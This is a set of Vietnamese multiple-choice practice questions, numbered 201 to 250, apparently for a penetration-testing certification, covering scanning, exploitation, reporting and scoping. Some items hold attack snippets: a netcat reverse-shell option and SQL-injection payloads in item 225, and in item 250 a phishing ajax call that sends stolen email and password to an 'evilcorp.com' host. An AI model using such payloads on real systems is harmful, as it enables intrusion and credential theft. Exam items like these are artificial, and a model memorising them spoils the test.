Câu 201:

Một chuyên gia kiểm tra thâm nhập đã khai thác một lỗ hổng trên máy chủ và chạy một payload từ xa để chiếm shell. Tuy nhiên, kết nối không được thiết lập và không có lỗi nào được hiển thị trên payload. Chuyên gia nghi ngờ rằng một thiết bị mạng, như IPS hoặc tường lửa thế hệ tiếp theo, đã chặn kết nối. Payload nào sau đây CÓ KHẢ NĂNG CAO NHẤT thiết lập thành công shell?

A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https

Câu 202:

Một chuyên gia kiểm tra thâm nhập được thuê để kiểm tra một trang web về các lỗi. Trong một trong những khoảng thời gian thử nghiệm, một kỹ sư mạng nhận thấy một lượng lớn các yêu cầu GET đến máy chủ web, làm giảm 80% thời gian phản hồi của trang web. Kỹ sư mạng liên hệ với chuyên gia kiểm tra thâm nhập để xác định xem các yêu cầu GET này có phải là một phần của bài kiểm tra hay không. Điều nào sau đây mô tả TỐT NHẤT mục đích của việc kiểm tra với chuyên gia kiểm tra thâm nhập?

A. Nhận thức tình huống
B. Lập lại lịch trình
C. Phòng thủ DDoS
D. Giải quyết xung đột

Câu 203:

Tài nguyên nào sau đây là TỐT NHẤT để lấy các payload chống lại các sản phẩm cơ sở hạ tầng mạng cụ thể?

A. Exploit-DB
B. Metasploit
C. Shodan
D. Retina

Câu 204:

Một chuyên gia kiểm tra thâm nhập đưa ra lệnh sau cho quản trị viên hệ thống để thực thi trên một trong các máy chủ mục tiêu:

rm -f /var/www/html/G679h32gYu.php

Điều nào sau đây giải thích TỐT NHẤT lý do tại sao chuyên gia kiểm tra thâm nhập muốn lệnh này được thực thi?

A. Để lừa quản trị viên hệ thống cài đặt rootkit
B. Để đóng một reverse shell
C. Để xóa web shell sau bài kiểm tra thâm nhập
D. Để xóa thông tin đăng nhập mà chuyên gia đã tạo

Câu 205:

Đoạn mã PowerShell sau được trích xuất từ ​​nhật ký của máy của kẻ tấn công:

      1. $net="192.168.1."
2. $setipaddress ="192.168.2."
3. function Test-Password {
4. if (args[0] -eq 'Dummy12345') {
5. return 1
6. }
7. else {
8. $cat = 22, 25, 80, 443
9. return 0
10. }
11. }
12. $cracked = 0
13. $crackedpd = [ 192, 168, 1, 2]
14. $i =0
15. Do {
16. $test = 'Dummy' + $i
17. $cracked = Test-Password $test
18. $i++
19. $crackedpd = (192, 168, 1, 1) + $cat
20. }
21. While ($cracked -eq 0)
22. Write-Host " Password found : " $test
23. $setipaddress = [ 192, 168, 1, 4]
    

Một chuyên gia kiểm tra thâm nhập muốn xác định sự hiện diện của một mảng. Dòng nào sau đây sẽ định nghĩa mảng?

A. Dòng 8
B. Dòng 13
C. Dòng 19
D. Dòng 20

Câu 206:

Một công ty đã cung cấp phạm vi mạng sau cho một bài kiểm tra thâm nhập:

  • 169.137.1.0/24
  • 221.10.1.0/24
  • 149.14.1.0/24

Một chuyên gia kiểm tra thâm nhập đã phát hiện ra một lệnh thực thi từ xa trên địa chỉ IP 149.14.1.24 và khai thác hệ thống. Sau đó, chuyên gia biết được rằng địa chỉ IP cụ thể này thuộc về bên thứ ba. Bên liên quan nào sau đây chịu trách nhiệm cho sai lầm này?

A. Công ty yêu cầu kiểm tra thâm nhập
B. Công ty kiểm tra thâm nhập
C. Chủ sở hữu máy chủ mục tiêu
D. Chuyên gia kiểm tra thâm nhập
E. Nhà thầu phụ hỗ trợ bài kiểm tra

Câu 207:

Trong kho lưu trữ tệp mạng không được bảo vệ, một chuyên gia kiểm tra thâm nhập phát hiện ra một tệp văn bản chứa tên người dùng và mật khẩu ở dạng văn bản rõ ràng và một bảng tính chứa dữ liệu cho 50 nhân viên, bao gồm tên đầy đủ, vai trò và số sê-ri. Chuyên gia nhận ra một số mật khẩu trong tệp văn bản tuân theo định dạng: <tên-số sê-ri>. Hành động nào sau đây là tốt nhất cho chuyên gia thực hiện TIẾP THEO với thông tin này?

A. Tạo từ điển mật khẩu tùy chỉnh để chuẩn bị cho kiểm tra phun mật khẩu.
B. Đề xuất sử dụng trình quản lý / kho mật khẩu thay vì tệp văn bản để lưu trữ mật khẩu an toàn.
C. Đề xuất cấu hình quy tắc độ phức tạp của mật khẩu trong tất cả các hệ thống và ứng dụng.
D. Tạo một vị trí lưu trữ được niêm phong do TPM hỗ trợ trong đó kho lưu trữ tệp không được bảo vệ có thể được báo cáo.

Câu 208:

Trong giai đoạn trinh sát, một chuyên gia kiểm tra thâm nhập thu được kết quả sau:

      Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
    

Hệ điều hành nào sau đây CÓ KHẢ NĂNG CAO NHẤT được cài đặt trên máy chủ?

A. Linux
B. NetBSD
C. Windows
D. macOS

Câu 209:

Một chuyên gia kiểm tra thâm nhập tham gia nhóm đánh giá ở giữa bài đánh giá. Khách hàng đã yêu cầu nhóm, cả bằng lời nói và trong tài liệu phạm vi, không kiểm tra mạng sản xuất. Tuy nhiên, chuyên gia mới không biết về yêu cầu này và tiếp tục thực hiện khai thác trong môi trường sản xuất. Điều nào sau đây có thể ngăn chặn hiệu quả nhất sự hiểu lầm này?

A. Cấm khai thác trong môi trường sản xuất
B. Yêu cầu tất cả các chuyên gia kiểm tra xem xét kỹ lưỡng tài liệu phạm vi
C. Không bao giờ đánh giá mạng sản xuất
D. Cấm các chuyên gia kiểm tra tham gia nhóm trong quá trình đánh giá

Câu 210:

Thông tin đăng nhập người dùng được chụp từ cơ sở dữ liệu trong quá trình đánh giá và bị bẻ khóa bằng bảng cầu vồng. Dựa trên mức độ dễ dàng xâm nhập, thuật toán nào sau đây CÓ KHẢ NĂNG CAO NHẤT được sử dụng để lưu trữ mật khẩu trong cơ sở dữ liệu?

A. MD5
B. bcrypt
C. SHA-1
D. PBKDF2

Câu 211:

Một chuyên gia kiểm tra thâm nhập đã cố gắng tấn công đầu độc DNS. Sau khi thử, không thấy lưu lượng truy cập nào từ máy mục tiêu. Điều nào sau đây CÓ KHẢ NĂNG CAO NHẤT gây ra lỗi tấn công?

A. Việc tiêm quá chậm.
B. Thông tin DNS không chính xác.
C. Bộ nhớ cache DNS không được làm mới.
D. Máy khách không nhận được phản hồi đáng tin cậy.

Câu 212:

Trong quá trình đánh giá, một chuyên gia kiểm tra thâm nhập đã có thể truy cập mạng không dây của tổ chức từ bên ngoài tòa nhà bằng cách sử dụng máy tính xách tay chạy Aircrack-ng. Nên đề xuất khách hàng khắc phục sự cố này bằng cách nào sau đây?

A. Chuyển sang thiết bị Wi-Fi hỗ trợ mã hóa mạnh
B. Sử dụng ăng-ten định hướng
C. Sử dụng mã hóa WEP
D. Vô hiệu hóa Wi-Fi

Câu 213:

Một chuyên gia kiểm tra thâm nhập đang tiến hành kiểm tra thâm nhập và phát hiện ra lỗ hổng trên máy chủ web thuộc sở hữu của khách hàng. Khai thác lỗ hổng cho phép chuyên gia mở một reverse shell. Liệt kê máy chủ để leo thang đặc quyền, chuyên gia phát hiện ra điều sau:

      netstat -antu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp        0      0 10.1.1.24:48850 24.176.9.43:59036 ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*                  LISTEN
tcp        0      0 10.1.1.24:50112 136.12.56.217:58003 ESTABLISHED
tcp        0      0 10.1.1.24:80           115.93.193.245:40243 ESTABLISHED
tcp        0      0 10.1.1.24:80           210.117.12.2:40252 ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
udp        0      0 10.1.1.24:161          0.0.0.0:*
    

Chuyên gia kiểm tra thâm nhập nên làm gì TIẾP THEO?

A. Đóng reverse shell mà chuyên gia đang sử dụng.
B. Ghi nhận phát hiện này để đưa vào báo cáo cuối cùng.
C. Điều tra các kết nối cổng được đánh số cao.
D. Liên hệ ngay lập tức với khách hàng.

Câu 214:

Một chuyên gia kiểm tra thâm nhập đã thực hiện thành công một cuộc khai thác trên máy chủ và có thể nhảy từ VLAN 100 sang VLAN 200. VLAN 200 chứa các máy chủ thực hiện giao dịch tài chính và chuyên gia kiểm tra thâm nhập hiện muốn giao diện cục bộ của máy tấn công có mục nhập ARP tĩnh trong bộ nhớ cache cục bộ. Máy của kẻ tấn công có thông tin sau:

  • Địa chỉ IP: 192.168.1.63
  • Địa chỉ vật lý: 60-36-dd-a6-c5-33

Lệnh nào sau đây mà chuyên gia kiểm tra thâm nhập CÓ KHẢ NĂNG CAO NHẤT sẽ sử dụng để thiết lập mục nhập ARP tĩnh thành công?

A. tcpdump -i eth01 arp and arp[6:2] == 2
B. arp -s 192.168.1.63 60-36-DD-A6-C5-33
C. ipconfig /all findstr /v 00-00-00 | findstr Physical
D. route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

Câu 215:

Trong quá trình kiểm tra thâm nhập nội bộ đối với một công ty, chuyên gia kiểm tra thâm nhập đã có thể điều hướng đến một phần khác của mạng và tìm thấy một thư mục chứa thông tin khách hàng như địa chỉ, số điện thoại và số thẻ tín dụng. Để tuân thủ PCI, công ty nên thực hiện điều nào sau đây để bảo vệ TỐT NHẤT dữ liệu này?

A. Quét lỗ hổng
B. Phân đoạn mạng
C. Củng cố hệ thống
D. Phát hiện xâm nhập

Câu 216:

Một nhà phân tích bảo mật cần thực hiện quét cổng SMB 445 trên mạng /16. Lệnh nào sau đây sẽ là lựa chọn TỐT NHẤT khi tàng hình không phải là vấn đề đáng lo ngại và nhiệm vụ nhạy cảm về thời gian?

A. Nmap -s 445 -Pn -T5 172.21.0.0/16
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16
C. Nmap -sV –script=smb* 172.21.0.0/16
D. Nmap -p 445 -max -sT 172.21.0.0/16

Câu 217:

Chuyên gia kiểm tra thâm nhập đã phát hiện ra một tệp thực thi nhị phân Linux 64 bit không xác định. Công cụ nào sau đây là TỐT NHẤT để sử dụng để phân tích vấn đề này?

A. Peach
B. WinDbg
C. GDB
D. OllyDbg

Câu 218:

Một chuyên gia kiểm tra thâm nhập đã tìm thấy một số lỗ hổng tiêm SQL nghiêm trọng trong quá trình đánh giá hệ thống của khách hàng. Kỹ thuật khắc phục nào sau đây là TỐT NHẤT để đề xuất? (Chọn hai)

A. Đóng các dịch vụ đang mở
B. Mã hóa mật khẩu của người dùng
C. Ngẫu nhiên hóa thông tin đăng nhập của người dùng
D. Xác thực đầu vào của người dùng
E. Truy vấn tham số
F. Mã hóa đầu ra

Câu 219:

Cái nào sau đây là một công cụ quy tắc để quản lý tài khoản và tài nguyên đám mây công cộng?

A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite

Câu 220:

Một chuyên gia kiểm tra thâm nhập sẽ thực hiện quét lỗ hổng như một phần của kiểm tra thâm nhập trên trang web của khách hàng. Chuyên gia có kế hoạch chạy một số tập lệnh Nmap thăm dò các lỗ hổng trong khi tránh bị phát hiện. Chuyên gia kiểm tra thâm nhập CÓ KHẢ NĂNG CAO NHẤT sẽ sử dụng tùy chọn Nmap nào sau đây?

A. -sT -T0
B. –script “http*vuln*”
C. -sn
D. -O -A

Câu 221:

Một chuyên gia kiểm tra thâm nhập phát hiện ra rằng khách hàng sử dụng thư đám mây làm hệ thống email của công ty. Trong quá trình kiểm tra thâm nhập, chuyên gia đã thiết lập một trang đăng nhập thư đám mây giả mạo và gửi cho tất cả nhân viên công ty email cho biết hộp thư đến của họ đã đầy và hướng họ đến trang đăng nhập giả mạo để khắc phục sự cố. Điều nào sau đây mô tả TỐT NHẤT cuộc tấn công này?

A. Thu thập thông tin đăng nhập
B. Leo thang đặc quyền
C. Phun mật khẩu
D. Lạm dụng bản ghi miền

Câu 222:

Trong quá trình đánh giá, một chuyên gia kiểm tra thâm nhập thu được danh sách 30 địa chỉ email bằng cách thu thập thông tin trên trang web của công ty mục tiêu và sau đó tạo danh sách tên người dùng có thể có dựa trên định dạng địa chỉ email. Loại tấn công nào sau đây CÓ KHẢ NĂNG CAO NHẤT sẽ được sử dụng để tránh khóa tài khoản?

A. Mask
B. Rainbow
C. Dictionary
D. Phun mật khẩu

Câu 223:

Máy tấn công nằm trên cùng một phân đoạn LAN với máy chủ mục tiêu trong quá trình kiểm tra thâm nhập nội bộ. Lệnh nào sau đây sẽ TỐT NHẤT cho phép kẻ tấn công tiến hành khám phá máy chủ và ghi khám phá vào tệp mà không trả về kết quả của máy tấn công?

A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt
B. nmap -iR 10 -n -oX out.xml | grep “Nmap” | cut -d “” -f5 > live-hosts.txt
C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service
D. nmap -sS -Pn -n -iL target.txt -oA target_txt1

Câu 224:

Chuyên gia kiểm tra thâm nhập nên sử dụng công cụ nào sau đây để thu thập thông tin trên trang web và tạo danh sách từ bằng cách sử dụng dữ liệu được khôi phục để bẻ khóa mật khẩu trên trang web?

A. DirBuster
B. CeWL
C. w3af
D. Patator

Câu 225:

Một chuyên gia kiểm tra thâm nhập kiểm tra một danh mục mua sắm dựa trên web và phát hiện ra URL sau khi xem một sản phẩm trong danh mục:

http://company.com/catalog.asp?productid=22

Chuyên gia kiểm tra thâm nhập thay đổi URL trong trình duyệt thành như sau và nhận thấy có độ trễ khi trang làm mới:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY’00:00:05′

Chuyên gia kiểm tra thâm nhập nên thử TIẾP THEO điều nào sau đây?

A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell ‘whoami’
B. http://company.com/catalog.asp?productid=22′ OR 1=1 —
C. http://company.com/catalog.asp?productid=22′ UNION SELECT 1,2,3 —
D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Câu 226:

Đầu ra từ một công cụ kiểm tra thâm nhập cho thấy 100 máy chủ chứa các phát hiện do quản lý bản vá không đúng cách. Chuyên gia kiểm tra thâm nhập đã thực hiện điều nào sau đây?

A. Quét lỗ hổng
B. Tra cứu WHOIS
C. Chụp gói tin
D. Quét Nmap

Câu 227:

Sau khi chạy lệnh enum4linux.pl, một chuyên gia kiểm tra thâm nhập đã nhận được kết quả sau:

      Enumerating Workgroup/Domain on 192.168.100.56
[+] Got domain/workgroup name: WORKGROUP

Session Check on 192.168.100.56
[+] Server 192.168.100.56 allows sessions using username '', password ''

Getting domain SID for 192.168.100.56
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

Share Enumeration on 192.168.100.56
Sharename       Type      Comment
prints           Disk      Printer Drivers
web             Disk      File Server
IPC$            IPC       IPC Service (Samba 4.5.12-Debian)
SMB1 disabled  --        no workgroup available
[+] Attempting to map shares on 192.168.100.56
//192.168.100.56/print$        Mapping: DENIED, Listing: N/A
//192.168.100.56/web          Mapping: OK,  Listing: OK
//192.168.100.56/IPC$         [E] Can't understand response:
                                 NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Mon Jul 20 10:14:37 2020
    

Chuyên gia kiểm tra thâm nhập nên chạy lệnh nào sau đây TIẾP THEO?

A. smbspool //192.160.100.56/print$
B. net rpc share -S 192.168.100.56 -U “”
C. smbget //192.168.100.56/web -U “”
D. smbclient //192.168.100.56/web -U “” -N

Câu 228:

Trong quá trình đánh giá, một chuyên gia kiểm tra thâm nhập đã thu thập OSINT cho một trong những quản trị viên hệ thống CNTT từ công ty mục tiêu và quản lý để có được thông tin có giá trị, bao gồm địa chỉ email của công ty. Chuyên gia kiểm tra thâm nhập nên thực hiện kỹ thuật nào sau đây TIẾP THEO?

A. Nhân bản thẻ
B. Tấn công Watering hole
C. Mạo danh
D. Lừa đảo qua email

Câu 229:

Yêu cầu tuân thủ nào sau đây sẽ PHÙ HỢP NHẤT trong môi trường xử lý dữ liệu thẻ tín dụng?

A. PCI DSS
B. ISO 27001
C. SOX
D. GDPR

Câu 230:

Một chuyên gia kiểm tra thâm nhập đã xâm nhập thành công máy chủ web được nhắm mục tiêu và tạo thông tin đăng nhập với các đặc quyền của quản trị viên. Sau khi tiến hành khai thác dữ liệu, bước TIẾP THEO của chuyên gia nên là gì?

A. Xác định dữ liệu nào có sẵn trên máy chủ web.
B. Thay đổi hoặc xóa nhật ký.
C. Đăng xuất và di chuyển đến phiên mới.
D. Đăng nhập với tư cách là người dùng mới.

Câu 231:

Một chuyên gia kiểm tra thâm nhập đã phân tích tệp nhật ký của ứng dụng web và phát hiện một đầu vào được gửi đến ứng dụng web của công ty. Đầu vào chứa một chuỗi có nội dung “WAITFOR”. Cuộc tấn công nào sau đây đang được thực hiện?

A. Tiêm SQL
B. Tiêm HTML
C. Tiêm lệnh từ xa
D. Tiêm DLL

Câu 232:

Với đoạn mã sau:

      systems = {
    "10.10.10.1": "Windows 10",
    "10.10.10.2": "Windows 10",
    "10.10.10.3": "Windows 2016",
    "10.10.10.4": "Linux"
}
    

Cấu trúc dữ liệu nào sau đây là systems?

A. Tuple
B. Tree
C. Array
D. Dictionary

Câu 233:

Một chuyên gia kiểm tra thâm nhập đang thực hiện một cuộc kiểm tra phát hiện ra một máy chủ cụ thể dễ bị tấn công bởi EternalBlue. Điều nào sau đây sẽ bảo vệ TỐT NHẤT chống lại lỗ hổng này?

A. Phân đoạn mạng
B. Luân chuyển khóa
C. Mật khẩu được mã hóa
D. Quản lý bản vá

Câu 234:

Việc thực hiện kiểm tra thâm nhập trong một tổ chức yêu cầu xác định các tham số cụ thể liên quan đến bản chất và loại bài tập có thể được thực hiện và thời điểm chúng có thể được thực hiện. Cái nào sau đây xác định TỐT NHẤT khái niệm này?

A. Bản tuyên bố công việc
B. Phạm vi chương trình
C. Thỏa thuận không tiết lộ
D. Quy tắc tham gia

Câu 235:

Một chuyên gia kiểm tra thâm nhập đã trích xuất hàm băm mật khẩu từ quy trình bộ nhớ lsass.exe. Chuyên gia nên thực hiện TIẾP THEO điều nào sau đây để vượt qua hàm băm và duy trì quyền truy cập với thông tin đăng nhập mới có được?

A. Sử dụng Patator để vượt qua hàm băm và Responder để duy trì quyền truy cập.
B. Sử dụng Hashcat để vượt qua hàm băm và Empire để duy trì quyền truy cập.
C. Sử dụng bind shell để vượt qua hàm băm và WMI để duy trì quyền truy cập.
D. Sử dụng Mimikatz để vượt qua hàm băm và PsExec để duy trì quyền truy cập.

Câu 236:

Điều khoản nào xác định mức độ trách nhiệm giữa chuyên gia kiểm tra thâm nhập và khách hàng trong việc ngăn chặn tiết lộ trái phép được tìm thấy trong:

A. NDA
B. SLA
C. MSA
D. SOW

Câu 237:

Một chuyên gia kiểm tra thâm nhập đã tạo tập lệnh sau để sử dụng trong một cuộc kiểm tra:

      #!/usr/bin/python
import socket
ports = [21,22,23,25,80,139,443,445,3306,3389]
if len(sys.argv) == 2:
    target = socket.gethostbyname(sys.argv[1])
else:
    print("Too few arguments.")
    print("Syntax: python {} <target_ip>".format(sys.argv[0]))
    sys.exit()

try:
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        result = s.connect_ex((target,port))
        if result == 0:
            print("Port {} is opened".format(port))

except KeyboardInterrupt:
    print("Exiting...")
    sys.exit()
    

Tuy nhiên, khi chạy tập lệnh, chuyên gia nhận được thông báo lỗi sau:

      $ python script.py 192.168.0.1
Traceback (most recent call last):
  File "script.py", line 4, in <module>
    if len(sys.argv) == 2:
NameError: name 'sys' is not defined
    

Nguyên nhân nào sau đây gây ra lỗi?

A. Biến sys không được định nghĩa.
B. Biến argv không được định nghĩa.
C. Mô-đun sys không được nhập.
D. Mô-đun argv không được nhập.

Câu 238:

Một chuyên gia kiểm tra thâm nhập đã có thể xâm nhập máy chủ web và di chuyển ngang sang máy chủ web Linux. Bây giờ chuyên gia muốn xác định danh tính của người dùng cuối cùng đã đăng nhập vào máy chủ web. Tệp nhật ký nào sau đây sẽ hiển thị hoạt động này?

A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog

Câu 239:

Một chuyên gia kiểm tra thâm nhập đang tiến hành kiểm tra đối với một ứng dụng web hướng tới internet và đang lên kế hoạch cho một chiến dịch lừa đảo. Phương pháp thụ động nào sau đây là TỐT NHẤT để lấy thông tin liên hệ kỹ thuật cho trang web?

A. Tra cứu miền WHOIS
B. Danh sách việc làm và quảng cáo tuyển dụng
C. Thông tin chứng chỉ SSL
D. Dữ liệu vi phạm công khai

Câu 240:

Công cụ nào sau đây sẽ cho phép chuyên gia kiểm tra thâm nhập chụp bắt tay không dây để tiết lộ mật khẩu Wi-Fi từ máy Windows TỐT NHẤT?

A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng

Câu 241:

Một nhà phân tích bảo mật cần thực hiện một cuộc tấn công on-path trên các thiết bị thông minh BLE. Công cụ nào sau đây sẽ PHÙ HỢP NHẤT để hoàn thành nhiệm vụ này?

A. Wireshark
B. Gattacker
C. tcpdump
D. Netcat

Câu 242:

Trong quá trình đánh giá, một chuyên gia kiểm tra thâm nhập quản lý để khai thác lỗ hổng LFI và duyệt nhật ký web cho máy chủ Apache mục tiêu. Chuyên gia kiểm tra thâm nhập CÓ KHẢ NĂNG CAO NHẤT sẽ thử các bước nào sau đây TIẾP THEO để khai thác thêm máy chủ web? (Chọn hai)

A. Kịch bản chéo trang web
B. Giả mạo yêu cầu phía máy chủ
C. Tiêm SQL
D. Đầu độc nhật ký
E. Giả mạo yêu cầu chéo trang web
F. Tiêm lệnh

Câu 243:

Một chuyên gia kiểm tra thâm nhập đã mở một reverse shell trên máy chủ web Linux và leo thang đặc quyền thành công lên root. Trong quá trình kiểm tra, chuyên gia nhận thấy một người dùng khác thường xuyên đăng nhập với tư cách root để thực hiện các tác vụ công việc. Để tránh làm gián đoạn công việc của người dùng này, tùy chọn nào sau đây là TỐT NHẤT để chuyên gia kiểm tra thâm nhập duy trì quyền truy cập root trên máy chủ này trong quá trình kiểm tra?

A. Thêm web shell vào thư mục gốc của trang web.
B. Nâng cấp reverse shell lên thiết bị đầu cuối TTY thực.
C. Thêm người dùng mới có ID 0 vào tệp /etc/passwd.
D. Thay đổi mật khẩu của người dùng root và hoàn nguyên sau khi kiểm tra.

Câu 244:

Một công ty yêu cầu tất cả các máy ảo phải cài đặt các bản vá mới nhất hiện có. Điều nào sau đây giải thích TỐT NHẤT lý do tại sao chính sách này được áp dụng?

A. Để cung cấp bảo vệ chống lại các lỗ hổng của hệ điều hành máy chủ
B. Để giảm xác suất của một cuộc tấn công thoát khỏi máy ảo
C. Để sửa bất kỳ cấu hình sai nào của trình ảo hóa
D. Để bật tất cả các tính năng của trình ảo hóa

Câu 245:

Một chuyên gia kiểm tra thâm nhập phát hiện ra các khóa truy cập trong giải pháp quản lý mã nguồn của tổ chức. Điều nào sau đây sẽ giải quyết TỐT NHẤT vấn đề? (Chọn hai)

A. Thiết lập giải pháp quản lý bí mật cho tất cả các mục trong hệ thống quản lý mã nguồn
B. Triển khai kiểm soát truy cập dựa trên vai trò trên hệ thống quản lý mã nguồn
C. Cấu hình xác thực đa yếu tố trên hệ thống quản lý mã nguồn
D. Tận dụng giải pháp để quét các trường hợp tương tự khác trong hệ thống quản lý mã nguồn
E. Phát triển quy trình vòng đời phát triển phần mềm an toàn để đưa mã vào hệ thống quản lý mã nguồn
F. Tạo một trình kích hoạt sẽ ngăn các nhà phát triển bao gồm mật khẩu trong hệ thống quản lý mã nguồn

Câu 246:

Một chuyên gia kiểm tra thâm nhập đang tiến hành đánh giá chống lại một nhóm máy chủ web có sẵn công khai và nhận thấy một số TCP reset đang trả về từ một trong các máy chủ web. Điều nào sau đây CÓ KHẢ NĂNG CAO NHẤT gây ra TCP reset xảy ra trong quá trình đánh giá?

A. Máy chủ web đang sử dụng WAF.
B. Máy chủ web nằm sau bộ cân bằng tải.
C. Máy chủ web đang chuyển hướng các yêu cầu.
D. Phần mềm diệt vi-rút cục bộ trên máy chủ web đang từ chối kết nối.

Câu 247:

Một công ty điều tra tư nhân đang yêu cầu kiểm tra thâm nhập để xác định khả năng những kẻ tấn công có thể truy cập vào các thiết bị di động và sau đó khai thác dữ liệu từ các thiết bị đó. Phương pháp nào sau đây thuộc kỹ thuật xã hội, nếu thành công, CÓ KHẢ NĂNG CAO NHẤT sẽ cho phép thực hiện cả hai mục tiêu?

A. Gửi SMS với số dịch vụ giả mạo bao gồm liên kết để tải xuống ứng dụng độc hại.
B. Khai thác lỗ hổng trong MDM và tạo tài khoản và hồ sơ thiết bị mới.
C. Thực hiện vishing trên bộ phận hỗ trợ CNTT để thu thập danh sách IMEIs thiết bị được phê duyệt để giả mạo.
D. Nhiễm một trang web thường được nhân viên sử dụng bằng phần mềm độc hại nhắm vào kiến ​​trúc x86.

Câu 248:

Một chuyên gia kiểm tra thâm nhập được yêu cầu thực hiện quét lỗ hổng làm giảm khả năng dương tính giả và tăng dương tính thực của kết quả. Điều nào sau đây CÓ KHẢ NĂNG CAO NHẤT sẽ đạt được mục tiêu này?

A. Sử dụng OpenVAS ở chế độ mặc định
B. Sử dụng Nessus với thông tin đăng nhập
C. Sử dụng Nmap với tư cách là người dùng root
D. Sử dụng OWASP ZAP

Câu 249:

Một khách hàng đang đánh giá công ty kiểm tra thâm nhập yêu cầu ví dụ về công việc của mình. Hành động nào sau đây đại diện cho phương án TỐT NHẤT cho các chuyên gia kiểm tra thâm nhập?

A. Chỉnh sửa thông tin nhận dạng và cung cấp tài liệu của khách hàng trước đó.
B. Cho phép khách hàng chỉ xem thông tin trong khi ở trong không gian an toàn.
C. Xác định báo cáo nào không còn trong thời hạn bảo mật.
D. Cung cấp đầu ra thô từ các công cụ kiểm tra thâm nhập.

Câu 250:

Đối với một cuộc kiểm tra thâm nhập, một kỹ sư bảo mật quyết định mạo danh bộ phận hỗ trợ CNTT. Kỹ sư bảo mật gửi email lừa đảo chứa yêu cầu khẩn cấp để người dùng thay đổi mật khẩu của họ và liên kết đến https://example.com/index.html. Kỹ sư đã thiết kế cuộc tấn công để khi người dùng nhập thông tin đăng nhập, trang index.html sẽ lấy thông tin đăng nhập và sau đó chuyển chúng đến một máy chủ khác mà kỹ sư bảo mật đang kiểm soát. Với thông tin sau:

      $.ajax({
    url: 'https://evilcorp.com/email-list/finish.php',
    type: 'POST',
    dataType: 'html',
    data: {Email: emv, password: psv},
    success: function(msg) { }
});
    

Dòng mã nào sau đây mà kỹ sư bảo mật nên thêm vào để thực hiện thành công cuộc tấn công?

A. window.location = ‘https://evilcorp.com’
B. crossDomain: true
C. geturlparameter(‘username’)
D. redirectUrl = ‘https://example.com’

Để lại một bình luận

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Trending